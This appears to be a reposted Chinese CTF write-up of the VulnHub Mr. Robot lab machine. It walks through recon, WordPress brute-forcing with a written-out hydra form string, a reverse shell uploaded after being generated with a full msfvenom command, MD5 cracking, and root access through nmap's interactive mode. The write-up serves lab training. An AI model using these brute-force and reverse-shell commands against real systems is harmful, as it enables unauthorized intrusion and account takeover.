您当前的位置:首页 > 知乎文章

vlunhub的mrrobot靶机渗透

时间:2022-02-28 10:47:45  知乎原文链接  作者:网盾科技

1.mrrobot靶机

下载地址:vulnhub.com/entry/mr-ro

class="ztext-empty-paragraph">

2.任务目标

找到三个key

class="ztext-empty-paragraph">

3.内网靶机识别ip

arp-scan -l查看靶机的ip地址

class="ztext-empty-paragraph">

nmap端口扫描

class="ztext-empty-paragraph">

先访问80端口看看

class="ztext-empty-paragraph">

页面还挺酷炫的,访问一下robots.txt文件看看

class="ztext-empty-paragraph">

发现有一个字典文件和3个关于key的txt文件,访问那个dic字典文件会自动下载回来

class="ztext-empty-paragraph">

查看发现里面有很多密码

class="ztext-empty-paragraph">

我们访问一下key文件看看,发现是一串密文,尝试解密一下看看

class="ztext-empty-paragraph">

可以看到解密失败

class="ztext-empty-paragraph">

访问key-1.txt发现是一个wordpress站点

class="ztext-empty-paragraph">

尝试一下登录看看

class="ztext-empty-paragraph">

nikto扫描出来的目录有这些,没有发现其他的漏洞

class="ztext-empty-paragraph">

我们尝试用之前拿到的字典拿去爆破一下这个后台看看,这里我们尝试用wpscan扫描枚举过用户,但是没有枚举成功

class="ztext-empty-paragraph">

所以我们尝试一下hydra爆破一下用户名先,我们首先要知道wordpress的后台提交数据的post参数有哪些,抓个包看看先

使用hydra的参数http-post-from模拟表单提交,构造如下参数

/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username

^USER^表示用户名,^PASS^表示密码,F代表错误的内容,表示错误的账户-p密码随便输入,这里我们只是枚举账户

class="ztext-empty-paragraph">

可以看到已经枚举出一个Elliot的用户,我们再去爆破一下他的密码,也是用的同样的字典

class="ztext-empty-paragraph">

可以看到两个账户,我们就拿第一个先测试一下,使用wpscan扫描爆破一下

class="ztext-empty-paragraph">

这里我们爆破了很久,终于拿到了账号密码

class="ztext-empty-paragraph">

登录后台之后发现可以上传文件,我们找到网站模板上传的地方进行上传

class="ztext-empty-paragraph">

使用msf生成一个php反弹的shell文件

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4545 -o webshell.php

class="ztext-empty-paragraph">

生成之后直接上传

class="ztext-empty-paragraph">

上传之后在这个目录下可以看到我们上传的shell脚本

class="ztext-empty-paragraph">

我们需要点击访问一下才能出发反弹shell

class="ztext-empty-paragraph">

这样我们就拿到了shell,使用python切换成正常bash

class="ztext-empty-paragraph">

我们先找下目录下面的key文件这个才是任务

class="ztext-empty-paragraph">

直接查看是没有办法查看的

class="ztext-empty-paragraph">

查看另外一个md5密码文件发现robot的密码hash

class="ztext-empty-paragraph">

查看了一下文件权限发现是robot的

class="ztext-empty-paragraph">

我们切换到robot账户再试试,先解密

class="ztext-empty-paragraph">

直接切换

class="ztext-empty-paragraph">

查看key文件

class="ztext-empty-paragraph">

拿到第二个key,我们之前用find命令发现nmap可以利用提权,我们尝试提到root权限

class="ztext-empty-paragraph">

nmap的版本存在一个交互功能可以利用版本刚好在内

class="ztext-empty-paragraph">

输入之后发现已经是root权限了

class="ztext-empty-paragraph">

切换到root目录下发现第三个key文件

class="ztext-empty-paragraph">

拿到最后的key

class="ztext-empty-paragraph">

到此渗透结束

上一篇      下一篇    删除文章    编辑文章
发表评论 共有条评论
用户名: 密码:
验证码: 匿名发表
推荐资讯
相关文章
    无相关信息
栏目更新
栏目热门